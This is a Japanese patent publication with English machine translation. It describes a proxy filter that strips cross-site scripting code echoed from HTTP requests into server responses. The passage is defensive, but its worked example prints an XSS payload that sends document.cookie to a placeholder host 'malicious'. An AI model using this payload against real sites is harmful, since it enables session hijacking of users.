JP2005092564A

JP2005092564A - Filtering device

Info

Publication number: JP2005092564A
Application number: JP2003325597A
Authority: JP
Inventors: Hiroshi Miyazaki; 博宮崎
Original assignee: Hitachi Software Engineering Co Ltd
Current assignee: Hitachi Software Engineering Co Ltd
Priority date: 2003-09-18
Filing date: 2003-09-18
Publication date: 2005-04-07

Abstract

<P>PROBLEM TO BE SOLVED: To remove harmful illegal code remaining in an access response from a server to a client. <P>SOLUTION: This device which filters an access request to a server and the access response based on a preliminarily applied rule is configured to receive the access request, and to store the access request when any illegal code which is harmless for the server, but harmful for a client is included in the access request, and to receive the access response to the access request, and to remove the stored illegal code when the illegal code is remaining in the access response. <P>COPYRIGHT: (C)2005,JPO&NCIPI

Description

本発明は、クライアントと該クライアントからのアクセス要求に対して応答を返すサーバとの間で行われる通信を中継する際に、前記アクセス要求に含まれ、該サーバによって取り除かれずに前記応答に残った不正コードをフィルタリングする装置に関するものである。 When relaying communication performed between a client and a server that returns a response to the access request from the client, the present invention is included in the access request and remains in the response without being removed by the server The present invention relates to an apparatus for filtering illegal codes.

インターネットに公開したＷｅｂサーバに対する不正アクセスを防止する技術としてファイアウォールがある。ファイアウォールは、Ｗｅｂサーバに送られたアクセス要求をＷｅｂサーバの代わりに受け取り、そのアクセス要求が予め定められたルールに従っていればＷｅｂサーバに転送し、従っていなければ転送しない。
そのようなファイアウォールの一種として、ＷｅｂサーバやＷｅｂサーバ上に構築されたＷｅｂアプリケーションの脆弱性を悪用した不正アクセスを防ぐことを目的としたものがある。例えば、特開２００２−３４２２７９号公報に開示されたものがこれに相当する。これは、Ｗｅｂサーバとの通信に用いられるＨＴＴＰ(Hyper-Text Transfer Protocol)の通信を解析し、既知の不正アクセスパターンと比較して不正アクセスの有無を検知するものである。 There is a firewall as a technique for preventing unauthorized access to a Web server published on the Internet. The firewall receives an access request sent to the Web server instead of the Web server, forwards the access request to the Web server if the access request conforms to a predetermined rule, and does not forward otherwise.
One type of such a firewall is to prevent unauthorized access by exploiting the vulnerability of a Web server or a Web application built on the Web server. For example, what was disclosed by Unexamined-Japanese-Patent No. 2002-342279 corresponds to this. This analyzes HTTP (Hyper-Text Transfer Protocol) communication used for communication with a Web server, and detects the presence or absence of unauthorized access in comparison with a known unauthorized access pattern.

一方、現在、広く使われているＷｅｂブラウザ（Ｗｅｂサーバにアクセスするクライアント側のソフトウェア）は、スクリプト言語で作成されたプログラム（以下、スクリプトと呼ぶ）を実行する能力を持つ。通常、スクリプトはＨＴＭＬ(Hyper-Text Markup Language)文書に埋め込まれ、Ｗｅｂサーバへのアクセス要求に対する応答として、ＷｅｂサーバからＷｅｂブラウザに送られる。送り込まれたスクリプトは、ＨＴＭＬだけで記述した文書では不可能な様々な機能を実現する。なお、Ｗｅｂブラウザが実行可能なスクリプト言語の代表的なものにＪａｖａＳｃｒｉｐｔ(Javaは登録商標）やＶＢＳｃｒｉｐｔなどがある。これらのスクリプト言語で記述されたスクリプトは、埋め込まれたＨＴＭＬ文書に関連する様々な情報にアクセスしたり、自動的にＷｅｂサーバへアクセス要求を送ったりできる。
特開２００２−３４２２７９号公報 On the other hand, currently widely used Web browsers (software on the client side that accesses a Web server) have the ability to execute programs (hereinafter referred to as scripts) created in a script language. Normally, a script is embedded in an HTML (Hyper-Text Markup Language) document and sent from the Web server to the Web browser as a response to an access request to the Web server. The sent script realizes various functions that are impossible with a document described only in HTML. Examples of script languages that can be executed by a Web browser include JavaScript (Java is a registered trademark), VBSscript, and the like. Scripts written in these script languages can access various information related to the embedded HTML document, and can automatically send an access request to the Web server.
JP 2002-342279 A

ところで、Ｗｅｂアプリケーションの脆弱性の１つにクロスサイトスクリプティング脆弱性と呼ばれるものがある。これは、アクセス要求に含まれたスクリプトを、Ｗｅｂアプリケーションが取り除くことに失敗し、Ｗｅｂブラウザへの応答に含めて返してしまうという脆弱性である。この脆弱性を利用すると、悪意のある者は不正なスクリプトを第三者のＷｅｂブラウザに読み込ませ、その不正なスクリプトを実行させることができる。
第三者に対して不正なスクリプトを埋め込んだアクセス要求を送らせるために、悪意のある者は罠を仕込む。例えば、自分のホームページにターゲットとなるＷｅｂアプリケーションへのリンクを張っておく。そしてこのリンクは、クリックすると不正なスクリプトを含むアクセス要求をＷｅｂアプリケーションへ送るようにしておく。たまたま罠が張られたホームページを訪れた第三者がそのリンクをクリックすると、その第三者のＷｅｂブラウザは不正なスクリプト付きのアクセス要求をＷｅｂアプリケーションに送ってしまう。そして、そのＷｅｂアプリケーションがその不正なスクリプトを取り除くのに失敗し応答に含めてしまうと、これを受け取ったＷｅｂブラウザ上でその不正なスクリプトが実行されてしまう。
多くのＷｅｂアプリケーションは、個々のＷｅｂブラウザとの通信セッションを識別するために、セッションＩＤをＨＴＴＰ通信のクッキーと呼ばれる部分に埋め込み、Ｗｅｂブラウザとやり取りする。このようなＷｅｂアプリケーションに前記のようなクロスサイトスクリプティング脆弱性があった場合、悪意のある者はこのＷｅｂアプリケーションにアクセスしたＷｅｂブラウザに、クッキーを読み込んで他のＷｅｂサーバに送る不正なスクリプトを送り込み、セッションＩＤを盗むことができてしまう。盗んだセッションＩＤを使えば、元々そのセッションＩＤを割当てられたＷｅｂブラウザ（を使用するユーザ）に成り代わってＷｅｂアプリケーションへ不正にアクセスする、いわゆるセッションハイジャック攻撃を行える。 By the way, one of the vulnerabilities of Web applications is called a cross-site scripting vulnerability. This is a vulnerability in which the script included in the access request fails to be removed by the Web application and is returned in the response to the Web browser. By using this vulnerability, a malicious person can load an unauthorized script into a third party's Web browser and execute the unauthorized script.
In order to send an access request with an illegal script embedded to a third party, a malicious person prepares a trap. For example, a link to a target Web application is provided on his home page. When this link is clicked, an access request including an illegal script is sent to the Web application. When a third party who happens to visit a homepage with a habit is clicking on the link, the third party's web browser sends an access request with an illegal script to the web application. If the Web application fails to remove the malicious script and includes it in the response, the malicious script is executed on the Web browser that received the script.
Many web applications embed a session ID in a part called HTTP cookie in order to identify a communication session with an individual web browser, and exchange with the web browser. When such a web application has the cross-site scripting vulnerability as described above, a malicious person sends an illegal script that reads a cookie and sends it to another web server to the web browser that accessed the web application. The session ID can be stolen. If a stolen session ID is used, a so-called session hijacking attack that illegally accesses a Web application on behalf of the Web browser to which the session ID is originally assigned (user who uses the session ID) can be performed.

クロスサイトスクリプティング脆弱性は、ＷｅｂアプリケーションがＷｅｂブラウザからのアクセス要求に含まれる不正なスクリプトを適切に取り除き、応答に含めなければ防げる。しかしながら、Ｗｅｂアプリケーションを構築する技術者の不注意や技術力不足などのため、クロスサイトスクリプティング脆弱性を持つＷｅｂアプリケーションが多く存在すると言われている。
なお、クロスサイトスクリプティング脆弱性や、これを悪用した攻撃方法、この脆弱性を持つＷｅｂアプリケーションのあるＷｅｂサイトについては、下記の非特許文献に詳しい。
高木浩光他：クロスサイトスクリプティング攻撃に対する電子商取引サイトの脆弱さの実態とその対策：ＩＰＳＪＣＳＥＣ第４回コンピュータセキュリティシンポジウム（ＣＳＳ２００１） The cross-site scripting vulnerability can be prevented if the Web application appropriately removes an illegal script included in the access request from the Web browser and does not include it in the response. However, it is said that there are many web applications having cross-site scripting vulnerabilities due to carelessness of engineers who build web applications and lack of technical capabilities.
The cross-site scripting vulnerability, an attack method using this vulnerability, and a Web site with a Web application having this vulnerability are detailed in the following non-patent documents.
Hiromitsu Takagi et al .: Vulnerability of e-commerce sites against cross-site scripting attacks and countermeasures: IPSJ CSEC 4th Computer Security Symposium (CSS 2001)

前述のクロスサイトスクリプティング脆弱性を悪用した攻撃からＷｅｂアプリケーションを保護する方法の一つとして、前記特開２００２−３４２２７９号のように、Ｗｅｂアプリケーションへのアクセス要求をＷｅｂアプリケーションの代わりに受け取り、フィルタリングする方法が考えられる。
例えば、ＨＴＭＬ文書においてスクリプトの存在を示す、“＜SCRIPT＞”と“＜/SCRIPT＞”に囲まれたデータのように、「不正とみなすデータ」がアクセス要求に含まれていたら、アクセス要求をＷｅｂアプリケーションに転送しなければよい。しかし、ホームページ検索サービスのように、ユーザから送られたデータをＷｅｂアプリケーションの入力としてそのまま使う場合、先にフィルタリングできない場合もある。
また、Ｗｅｂアプリケーションからの応答をフィルタリングする場合、その応答中のＨＴＭＬ文書にはアクセス要求に含まれていたスクリプトだけでなく、Ｗｅｂアプリケーション自身によって埋め込まれたスクリプトが含まれる可能性がある。それらを区別するには事前に不正ではないスクリプトについての情報（ＷｅｂページのＵＲＩ(uniform resource identifier)やＷｅｂページ内での位置など）を何らかの方法でフィルタに登録する必要がある。しかし、これを人手で行うには、特に大規模なＷｅｂサイトでは、手間もかかる上に登録洩れの恐れもある。この登録作業を自動化するには、アクセス要求の内容に応じて内容が変わるＷｅｂページの扱いが難しい。 As one of methods for protecting a Web application from an attack that exploits the above-mentioned cross-site scripting vulnerability, an access request to the Web application is received instead of the Web application and filtered as in JP-A-2002-342279. A method is conceivable.
For example, if an access request contains “data considered to be invalid”, such as data enclosed in “<SCRIPT>” and “</ SCRIPT>” indicating the existence of a script in an HTML document, It does not have to be transferred to the Web application. However, when the data sent from the user is used as it is as the input of the Web application as in the homepage search service, it may not be filtered first.
When filtering a response from the Web application, the HTML document in the response may include not only the script included in the access request but also a script embedded by the Web application itself. In order to distinguish between them, it is necessary to register information about a script that is not illegal in advance (such as a URI (uniform resource identifier) of the Web page or a position in the Web page) in a filter in some way. However, in order to do this manually, especially on a large-scale Web site, it takes time and there is a risk of omission of registration. In order to automate this registration work, it is difficult to handle Web pages whose contents change according to the contents of the access request.

そこで本発明は、Ｗｅｂアプリケーションへのアクセス要求とこの要求に対する応答との両方を監視することで、予め定めされた不正とみなすコードを前記応答から取り除く手段を持つフィルタリング装置を提供することを目的とする。 Therefore, an object of the present invention is to provide a filtering device having means for removing a predetermined code regarded as fraud from the response by monitoring both an access request to the Web application and a response to the request. To do.

上記目的を達成するために、本発明のフィルタリング装置は、クライアントと、該クライアントからのアクセス要求に対してアクセス応答を返すサーバとの間で行われる通信を中継し、ルールテーブルに予め記憶した不正コード検出ルールに基づいて前記アクセス要求をフィルタリングするＩＮフィルタと、前記不正コード検出ルールに基づいて前記アクセス応答をフィルタリングするＯＵＴフィルタとを備えたフィルタリング装置であって、
前記ＩＮフィルタは、前記クライアントからのアクセス要求を受け、該アクセス要求中に前記不正コード検出ルールに規定されたコードが含まれているかを検査し、含まれていたならば当該コードをバッファメモリへコピーする手段を備え、
前記ＯＵＴフィルタは、前記サーバからのアクセス応答を受け、該アクセス応答中に前記バッファメモリに記憶されているコードに対応するコードが含まれているかを検査し、含まれていた場合には、当該コードを、前記バッファメモリに記憶されているコードを検出した不正コード検出ルールに規定された処理に基づき変更する手段を備えることを特徴とする。
また、前記不正コード検出ルールは不正なタグを検出するルールである不正タグ検出ルールであることを特徴とする。
また、前記不正コード検出ルールは不正なタグ属性値を検出するルールである不正タグ属性値検出ルールであることを特徴とする。
また、前記前記不正コード検出ルールを更新するインタフェースを備えることを特徴とする。 In order to achieve the above object, the filtering device of the present invention relays communication performed between a client and a server that returns an access response to the access request from the client, and stores the fraud stored in the rule table in advance. A filtering device comprising: an IN filter that filters the access request based on a code detection rule; and an OUT filter that filters the access response based on the malicious code detection rule,
The IN filter receives an access request from the client, checks whether the code specified in the illegal code detection rule is included in the access request, and if included, the code is stored in the buffer memory. With means to copy,
The OUT filter receives an access response from the server, checks whether the code corresponding to the code stored in the buffer memory is included in the access response, and if included, It is characterized by comprising means for changing the code based on the processing defined in the illegal code detection rule that detected the code stored in the buffer memory.
The illegal code detection rule is an illegal tag detection rule which is a rule for detecting an illegal tag.
The illegal code detection rule is an illegal tag attribute value detection rule that is a rule for detecting an illegal tag attribute value.
In addition, an interface for updating the illegal code detection rule is provided.

本発明によれば、サーバに対するアクセス要求に含まれた不正コードが該サーバにより取り除かれず、該アクセス要求に対する応答に残ったとしても、フィルタリング処理によって不正コードを取り除くことができる。
特に、クロスサイトスクリプティング脆弱性を持つＷｅｂアプリケーションが、受け取ったＨＴＴＰ要求に含まれる不正なスクリプトをＨＴＴＰ応答に含めてしまっても、該不正スクリプトは本発明のフィルタリング処理により取り除かれ、ＨＴＴＰ応答を受け取るＷｅｂブラウザで実行されない。
本発明のフィルタリング装置は、アクセス要求に含まれる不正コードは取り除かずに目星を付けておき、該目星を付けておいた不正コードが該アクセス要求への応答に残っていたら取り除く手法である。従って、サーバにとっては無害で意味があるが、クライアントにとっては有害となる不正なコードを取り除くことができる。
また、このような不正コードは、本来はサーバによって取り除かれなければならない。しかし、クロスサイトスクリプティング脆弱性を持つＷｅｂアプリケーションが世の中に存在するように、アクセス要求の処理や応答の生成処理を開発する者の不注意や技術力不足のため、応答内に不正コードが残ることがある。本発明のフィルタリング装置ではこのような問題も一挙に解決することができる。
さらに、多くのＷｅｂアプリケーションは無害なスクリプトをＨＴＭＬ文書に埋め込んでクライアントに送っている。そのため、このようなスクリプトと、ＨＴＴＰ要求に含まれ、誤ってＨＴＴＰ応答に残ってしまった不正なスクリプトとを区別することが必要になる。このような区別のために、Ｗｅｂアプリケーションの開発者が無害なスクリプトのＨＴＭＬ文書内での位置やスクリプトそのものを各ＨＴＭＬ文書ごとにフィルタリング装置に指示することは、大きな手間がかかる。特に、動的に生成されるＨＴＭＬ文書では、生成後に含まれるスクリプトが異なる可能性もあり、指示方法が複雑になると予想できる。本発明のフィルタリング装置によれば、不正なコードをアクセス要求を受け取った時に目星を付け、アクセス応答に残っていたら取り除く。従って、前記のような区別は自動的に行われ、サーバの管理者の手間を省くことができる。管理者が行う作業は、フィルタリング用の幾つかのルールを考案し、フィルタリング装置に与えることだけになる。そのうえ、クロスサイトスクリプティング脆弱性のように広く知れ渡っているものであれば、本発明の実施例で示したようなルールが世の中で共通に利用可能である。Ｗｅｂアプリケーションの開発者は本発明の普及により、コンピュータウィルスの検知・駆除用のウィルス定義ファイルを入手するのと同様に、適切なルールを信頼できる者から取り寄せてフィルタリング装置に設定する作業だけを行えばよいようになる。 According to the present invention, even if the malicious code included in the access request to the server is not removed by the server and remains in the response to the access request, the malicious code can be removed by the filtering process.
In particular, even if a Web application having a cross-site scripting vulnerability includes an illegal script included in the received HTTP request in the HTTP response, the malicious script is removed by the filtering processing of the present invention, and an HTTP response is received. It is not executed in the Web browser.
The filtering device according to the present invention is a method of adding a star without removing a malicious code included in an access request, and removing the malicious code with the star remaining in a response to the access request. . Therefore, malicious code that is harmless and meaningful to the server but harmful to the client can be removed.
Also, such malicious code must be removed by the server. However, as there are Web applications with cross-site scripting vulnerabilities in the world, malicious code remains in the response due to the carelessness and lack of technical skills of those who develop access request processing and response generation processing. There is. Such a problem can be solved at once by the filtering device of the present invention.
Furthermore, many Web applications embed harmless scripts in HTML documents and send them to clients. Therefore, it is necessary to distinguish such a script from an illegal script included in the HTTP request and erroneously left in the HTTP response. For this distinction, it takes a lot of trouble for the Web application developer to instruct the filtering device for the position of the harmless script in the HTML document and the script itself for each HTML document. In particular, in a dynamically generated HTML document, the script included after generation may be different, and it can be expected that the instruction method becomes complicated. According to the filtering device of the present invention, an illegal code is marked when an access request is received, and removed if it remains in the access response. Therefore, the above-described distinction is automatically performed, and the labor of the server administrator can be saved. The administrator only has to devise some rules for filtering and give them to the filtering device. In addition, the rules shown in the embodiments of the present invention can be commonly used in the world as long as they are widely known, such as cross-site scripting vulnerabilities. As a result of the widespread use of the present invention, Web application developers only obtain the appropriate rules from a reliable person and set them in the filtering device in the same way as obtaining virus definition files for computer virus detection and removal. I will do it.

以下、本発明の実施の形態を図面を参照して詳細に説明する。
図１は、本発明のフィルタリング装置を適用したネットワークシステムの実施の形態を示すシステム構成図である。
図１において、１０１はコンピュータ間の通信データが流れるネットワークである。なお、本実施形態ではコンピュータ間の通信プロトコルとしてＨＴＴＰを例に説明するが、本実施形態で示す手順は他のプロトコルに対しても適用可能である。
１０２はネットワーク１０１に接続するクライアントコンピュータである。クライアントコンピュータ１０２ではＷｅｂブラウザ１０３が動作している。ユーザはクライアントコンピュータ１０２を介してＷｅｂブラウザ１０３を操作し、ネットワーク１０１に接続されたＷｅｂサーバ１０５へＨＴＴＰ要求を送る。
１０４はサーバコンピュータであり、Ｗｅｂサーバ１０５とＷｅｂアプリケーション１０６が動作している。Ｗｅｂサーバ１０５はＷｅｂブラウザ１０３からのＨＴＴＰ要求を受付け、Ｗｅｂアプリケーション１０６へ渡す。Ｗｅｂアプリケーション１０６はＨＴＴＰ要求に含まれるデータに対して所定の処理を行い、ＨＴＴＰ応答を生成してＷｅｂサーバ１０５へ渡す。そしてＷｅｂサーバ１０５がそのＨＴＴＰ応答をＷｅｂブラウザ１０３へ送る。
ここでＷｅｂアプリケーション１０６は、ＨＴＭＬのフォーム機能を利用してＷｅｂブラウザを操作するユーザに文字列を入力させ、その文字列をＨＴＴＰ要求で受け取る。そして、その文字列にスクリプトなどの不正なコードが含まれているか調べずにそのまま表示するＨＴＭＬ文書を生成し、ＨＴＴＰ応答に含めてＷｅｂブラウザに送り返すものとする。なお、どのような文字列を不正なコードと定義するかはＷｅｂアプリケーション１０６に依存する。 Hereinafter, embodiments of the present invention will be described in detail with reference to the drawings.
FIG. 1 is a system configuration diagram showing an embodiment of a network system to which a filtering device of the present invention is applied.
In FIG. 1, reference numeral 101 denotes a network through which communication data between computers flows. In this embodiment, HTTP will be described as an example of a communication protocol between computers, but the procedure shown in this embodiment can be applied to other protocols.
Reference numeral 102 denotes a client computer connected to the network 101. A Web browser 103 is operating on the client computer 102. The user operates the Web browser 103 via the client computer 102 and sends an HTTP request to the Web server 105 connected to the network 101.
A server computer 104 operates the Web server 105 and the Web application 106. The web server 105 receives an HTTP request from the web browser 103 and passes it to the web application 106. The Web application 106 performs predetermined processing on the data included in the HTTP request, generates an HTTP response, and passes it to the Web server 105. Then, the web server 105 sends the HTTP response to the web browser 103.
Here, the Web application 106 causes a user operating the Web browser to input a character string using the HTML form function, and receives the character string as an HTTP request. Then, it is assumed that an HTML document to be displayed as it is without checking whether or not an illegal code such as a script is included in the character string, is sent back to the Web browser as an HTTP response. Note that what character string is defined as an invalid code depends on the Web application 106.

本実施形態のＷｅｂアプリケーション１０６は、ユーザがログイン後に、ユーザが与えた検索文字列でＷｅｂサイト内のデータを検索し、一致した項目を表示するものと仮定する。ユーザがログイン後にはセッションＩＤがクッキーにセットされ、その後のＨＴＴＰ要求やＨＴＴＰ応答に含まれるとする。ユーザに検索文字列を入力させるフォームを含むＨＴＭＬ文書の例を図２に、検索結果を表示するＨＴＭＬ文書を図３に示す。
また、Ｗｅｂアプリケーション１０６が不正コードとみなす文字列はスクリプトとする。
１０７は本発明に係るフィルタリング装置であり、ネットワーク１０１とサーバコンピュータ１０４間の通信を中継する。その際、ＩＮフィルタ１０８とＯＵＴフィルタ１０９がルールテーブル１１０に予め設定された不正コード検出ルールに基づいてその通信内容をフィルタリングする。ルールテーブル１１０の詳細は図４で、フィルタリング処理の詳細は図５以降で説明する。
ルール入出力部１１１は、フィルタリング装置１０７の外部からルールテーブル１１０を参照及び更新するためのインタフェースである。本実施形態では、インタフェースの種類を特定しないが、入力用キーボードと表示用ディスプレイの組み合わせでも、ネットワークでもよい。これらインタフェースを通して、フィルタリング装置１０７の管理者はルールテーブル１１０に不正コード検出ルールを追加したり、更新したりする。
なお、本実施形態で示すＨＴＭＬタグや属性名、属性値の検索は全て大文字小文字を区別しない。 It is assumed that the Web application 106 according to the present embodiment searches for data in the Web site using a search character string provided by the user after the user logs in and displays matching items. It is assumed that after the user logs in, the session ID is set in a cookie and is included in subsequent HTTP requests and HTTP responses. FIG. 2 shows an example of an HTML document including a form for allowing a user to input a search character string, and FIG. 3 shows an HTML document that displays a search result.
A character string that the Web application 106 regards as an illegal code is a script.
A filtering apparatus 107 according to the present invention relays communication between the network 101 and the server computer 104. At that time, the IN filter 108 and the OUT filter 109 filter the communication contents based on the malicious code detection rule preset in the rule table 110. Details of the rule table 110 will be described with reference to FIG. 4, and details of the filtering process will be described with reference to FIG.
The rule input / output unit 111 is an interface for referring to and updating the rule table 110 from the outside of the filtering device 107. In this embodiment, the type of interface is not specified, but a combination of an input keyboard and a display for display or a network may be used. Through these interfaces, the administrator of the filtering device 107 adds or updates an illegal code detection rule to the rule table 110.
Note that the search for HTML tags, attribute names, and attribute values shown in this embodiment is not case sensitive.

図２は、本実施形態におけるＷｅｂアプリケーション１０６がユーザに検索文字列を入力させる場合の入力フォームのＨＴＭＬ文書の例を示すものである。このＨＴＭＬ文書を表示したクライアントコンピュータ１０２のＷｅｂブラウザ１０３上でユーザが検索文字列を入力して”search”ボタンを押すと、ユーザが入力した検索文字列がＨＴＴＰ要求に含まれＷｅｂアプリケーション１０６に送られる。 FIG. 2 shows an example of an HTML document of an input form when the Web application 106 in this embodiment allows a user to input a search character string. When the user inputs a search character string on the Web browser 103 of the client computer 102 displaying the HTML document and presses the “search” button, the search character string input by the user is included in the HTTP request and sent to the Web application 106. It is done.

図３は、本実施形態におけるＷｅｂアプリケーション１０６が検索結果を表示するために生成するＨＴＭＬ文書の例を示すものである。ここでは簡単のため、検索文字列に一致するデータが見つからず、その文字列を表示する例を示している。実際にユーザが入力した検索文字列は、図３の”your_search_key”と置き換わり表示される。 FIG. 3 shows an example of an HTML document generated in order for the Web application 106 in this embodiment to display a search result. Here, for the sake of simplicity, an example is shown in which data that matches the search character string is not found and that character string is displayed. The search character string actually input by the user is displayed in place of “your_search_key” in FIG.

図４は、本実施形態におけるルールテーブル１１０の詳細を示す図である。
図４の１行目を除く各行が、ＩＮフィルタ１０８とＯＵＴフィルタ１０９のフィルタリング処理を規定するルールである。それぞれの列は順に、（１）ルール参照番号、（２）不正コード検索キーの指定（以下、ｋｅｙと略す）、（３）不正コードを含む可能性のある要素のタグ名（同tag_name）、（４）タグ名だけで不正コードの有無を判断できない時に調べる、前記タグの属性の名前（同attr_name）、（５）不正コードがあると判断する、前記属性の値（同attr_value）、（６）発見した不正コードを無害化するための処理方法（同action）を表す。
ルールテーブル１１０は、不正タグを検出するルールと不正タグ属性値を検出するルールとの２種類のルールを持つ。
ルールの内容は、ＨＴＴＰ要求やＨＴＴＰ応答に含まれるどのような文字列を不正コードとみなすかによって異なる。図４に示す各ルールはあくまでも一例である。
なお、図４の１行目は、本実施形態の説明でルールテーブル１１０の各列のデータを識別し易くするために便宜上、記したもので、実際のルールテーブルにはなくてもよい。さらに本実施形態ではルールデータのまとまりを便宜上ルールテーブルと呼ぶが、実際のデータ形式はフィルタリング装置の扱いやすいもの、例えば２次元配列やリンクリストなどでもよい。本発明では、このような２次元配列やリンクリストを総称してルールテーブルと言う。
また、不正コードの挿入方法は日々新たに発見されていくので、実際のルールテーブルの書式や具体的なルールは図４に限定されない。 FIG. 4 is a diagram showing details of the rule table 110 in the present embodiment.
Each line except the first line in FIG. 4 is a rule that defines the filtering process of the IN filter 108 and the OUT filter 109. Each column is, in order, (1) rule reference number, (2) specification of illegal code search key (hereinafter abbreviated as “key”), (3) tag name of element that may contain illegal code (same tag_name), (4) The attribute name of the tag (same attr_name) to be examined when the presence / absence of the illegal code cannot be determined only by the tag name, (5) the attribute value (same attr_value), (6) ) Represents a processing method (same action) for detoxifying the discovered malicious code.
The rule table 110 has two types of rules: a rule for detecting an illegal tag and a rule for detecting an illegal tag attribute value.
The content of the rule differs depending on what character string included in the HTTP request or HTTP response is regarded as an illegal code. Each rule shown in FIG. 4 is merely an example.
Note that the first row in FIG. 4 is shown for convenience in order to make it easy to identify the data in each column of the rule table 110 in the description of the present embodiment, and may not be in the actual rule table. Further, in the present embodiment, a group of rule data is referred to as a rule table for convenience, but the actual data format may be an easy-to-handle filter device such as a two-dimensional array or a linked list. In the present invention, such a two-dimensional array and a linked list are collectively referred to as a rule table.
In addition, since the method for inserting illegal codes is newly discovered every day, the actual rule table format and specific rules are not limited to those shown in FIG.

図５は、本実施形態におけるフィルタリング装置１０７の処理手順を示すフローチャートである。
ここで示す手順は、ネットワーク１０１経由で送られたＷｅｂサーバ１０５宛てのＨＴＴＰ要求をフィルタリング装置１０７が受け取ったときに開始する。
まず、ステップ５０１において、フィルタリング装置１０７はそのメモリ上に領域を確保した一致文字列バッファを初期化する。一致文字列バッファはＩＮフィルタ１０８の処理結果をＯＵＴフィルタ１０９へ渡すためのバッファである。その詳細は図８において説明する。
次に、ステップ５０２において、フィルタリング装置１０７は受け取ったＨＴＴＰ要求を内部メモリ中にコピーし、ＩＮフィルタ１０８に渡す。
次に、ステップ５０３において、ＩＮフィルタ１０８は、渡されたＨＴＴＰ要求のコピーをルールテーブル１１０に規定されたルールに従い処理し、その結果を前記一致文字列バッファに書き込む。この処理の詳細は図６を用いて説明する。
次に、ステップ５０４において、フィルタリング装置１０７はＷｅｂブラウザ１０３から受け取ったＨＴＴＰ要求をその宛先であるＷｅｂサーバ１０５へ送る。
次に、ステップ５０５において、フィルタリング装置１０７はＷｅｂサーバ１０５からＨＴＴＰ要求の処理結果であるＨＴＴＰ応答を受け取るまで待機する。
次に、ステップ５０６において、フィルタリング装置１０７はＨＴＴＰ応答を受け取った後、ＩＮフィルタ１０８の処理結果が前記一致文字列バッファにあるかどうか調べる。すなわち、不正コード検出ルールに規定された不正コードに該当するコードの検出結果が一致文字列バッファに格納されているかどうかを調べる。もし、不正コードに該当するコードがなければ、一致文字列バッファは空であることになる。不正コードに該当するコードが格納されていたならば、続いてステップ５０７の処理を行い、格納されていなければ、ステップ５１１の処理に移る。
ステップ５０７では、フィルタリング装置１０７は、Ｗｅｂサーバ１０５から受け取ったＨＴＴＰ応答を内部メモリ中にコピーし、ＯＵＴフィルタ１０９に渡す。
次に、ステップ５０８において、ＯＵＴフィルタ１０９は、ＨＴＴＰ応答のコピーをルールテーブル１１０に規定されたルールに従い処理し、その結果をフィルタリング装置１０７に返す。この処理の詳細は図９を用いて説明する。
次に、ステップ５０９において、フィルタリング装置１０７は、ＯＵＴフィルタ１０９からの出力が空文字列であればステップ５１１の処理に移り、そうでなければ次のステップ５１０の処理を行う。
ステップ５１０では、フィルタリング装置１０７は、保持していたＨＴＴＰ応答を消去し、ＯＵＴフィルタ１０９からの出力文字列をＷｅｂサーバ１０３に送るＨＴＴＰ応答とする。
最後にステップ５１１では、フィルタリング装置１０７はＨＴＴＰ応答をＷｅｂブラウザ１０３に送る。 FIG. 5 is a flowchart showing a processing procedure of the filtering device 107 in this embodiment.
The procedure shown here starts when the filtering device 107 receives an HTTP request addressed to the Web server 105 sent via the network 101.
First, in step 501, the filtering device 107 initializes a matched character string buffer that secures an area on the memory. The matching character string buffer is a buffer for passing the processing result of the IN filter 108 to the OUT filter 109. Details thereof will be described with reference to FIG.
Next, in step 502, the filtering device 107 copies the received HTTP request into the internal memory and passes it to the IN filter 108.
Next, in step 503, the IN filter 108 processes the copy of the passed HTTP request in accordance with the rules defined in the rule table 110, and writes the result in the matching character string buffer. Details of this processing will be described with reference to FIG.
Next, in step 504, the filtering device 107 sends the HTTP request received from the web browser 103 to the web server 105 that is the destination.
Next, in step 505, the filtering apparatus 107 waits until receiving an HTTP response that is the processing result of the HTTP request from the Web server 105.
Next, in step 506, after receiving the HTTP response, the filtering device 107 checks whether the processing result of the IN filter 108 exists in the matching character string buffer. That is, it is checked whether the detection result of the code corresponding to the illegal code specified in the illegal code detection rule is stored in the matching character string buffer. If there is no code corresponding to the illegal code, the matching character string buffer is empty. If the code corresponding to the illegal code is stored, the process of step 507 is subsequently performed. If the code is not stored, the process proceeds to step 511.
In step 507, the filtering device 107 copies the HTTP response received from the Web server 105 into the internal memory and passes it to the OUT filter 109.
Next, in step 508, the OUT filter 109 processes a copy of the HTTP response according to the rules defined in the rule table 110, and returns the result to the filtering device 107. Details of this processing will be described with reference to FIG.
Next, in step 509, if the output from the OUT filter 109 is an empty character string, the filtering device 107 proceeds to the process of step 511, otherwise, the process of the next step 510 is performed.
In step 510, the filtering device 107 deletes the held HTTP response and sets the output character string from the OUT filter 109 as an HTTP response that is sent to the Web server 103.
Finally, in step 511, the filtering device 107 sends an HTTP response to the web browser 103.

図６は、本実施形態におけるＩＮフィルタ１０８の処理手順を示すフローチャートである。本手順はフィルタリング装置１０７からＨＴＴＰ要求を渡された時に開始される。本手順で取り上げる例では、図７に例示するのＨＴＴＰ要求が渡されたものとする。この図７のＨＴＴＰ要求に含まれたフォームの入力データには、実行されるとクッキーをhttp://malicious/に送るスクリプトが含まれている。
まず、ステップ６０１において、ＩＮフィルタ１０８はＨＴＴＰ要求に含まれたフォームの入力データを取り出す。図７の例ではＧＥＴメソッドが使われているので、指定されたＵＲＩのクエリストリング内（図中、１行目の”/cgi-bin/search?”以降）にフォームの入力項目名と入力文字列が含まれている。この文字列からフォーム入力文字列（同”ｋｅｙ＝”以降）を取り出す。本手順で取り上げる例では以下のような文字列である（両端のダブルクォーテーションは含まない）。
”test＜script＞window.open("http://malicious/save.cgi?"+escape(document.cookie))＜/script＞”
なお、フォームの送信にＰＯＳＴメソッドが使われていた場合、ＨＴＭＬ要求のメッセージ部にフォームの入力項目名とフォーム入力文字列が含まれる。この文字列からＧＥＴメソッドの場合と同様にしてフォーム入力文字列を取り出すことができる。 FIG. 6 is a flowchart showing the processing procedure of the IN filter 108 in this embodiment. This procedure is started when an HTTP request is passed from the filtering device 107. In the example taken up in this procedure, it is assumed that the HTTP request illustrated in FIG. 7 is passed. The form input data included in the HTTP request of FIG. 7 includes a script that, when executed, sends a cookie to http: // malicious /.
First, in step 601, the IN filter 108 retrieves form input data included in the HTTP request. In the example of Fig. 7, the GET method is used, so the form input item name and input character in the query string of the specified URI (after "/ cgi-bin / search?" On the first line in the figure) Contains columns. A form input character string (after “key =”) is extracted from this character string. In the example taken in this procedure, it is the following character string (not including double quotations at both ends).
